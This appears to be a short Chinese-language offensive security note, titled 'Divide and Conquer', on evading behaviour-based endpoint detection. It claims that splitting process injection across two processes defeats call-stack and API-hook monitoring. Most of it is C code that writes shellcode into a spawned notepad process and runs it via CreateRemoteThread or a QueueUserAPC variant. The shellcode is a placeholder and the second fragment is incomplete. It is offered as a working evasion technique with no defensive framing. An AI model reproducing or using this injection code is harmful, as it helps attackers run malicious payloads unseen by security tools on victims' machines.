Divide and Conquer
常见的行为检测会有监控堆栈的调用链和hookapi记录行为,这种分离执行方式都能绕过。
- 1.创建傀儡进程
- 2.向傀儡进程写入payload
- 3.创建同文件进程传入pid
- 4.通过pid打开傀儡句柄
- 5.创建远程线程
#include <stdio.h>
#include <windows.h>
unsigned char shellcode[] =
"\xfc78\x00";
int main(int argc, char* argv[]) {
if (argv[1]==NULL)
{
STARTUPINFOA si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
char cmd[MAX_PATH] = {0};
wsprintfA(cmd, "%s %d", argv[0], pi.dwProcessId);
CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
}
else
{
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)0x0000480000000000, 0, 0, 0);
}
return 0;
}
if (argv[1]==NULL)
{
STARTUPINFOA si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };
CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
VirtualAllocEx(pi.hProcess, (PVOID)0x0000480000000000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, (PVOID)0x0000480000000000, shellcode, sizeof(shellcode), NULL);
char cmd[MAX_PATH] = {0};
wsprintfA(cmd, "%s %d", argv[0], pi.dwThreadId);
QueueUserAPC((PAPCFUNC)0x0000480000000000, pi.hThread, NULL);
CreateProcessA(NULL, (LPSTR)cmd, NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
}
else
{
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, NULL, atoi(argv[1]));
ResumeThread(hThread);
}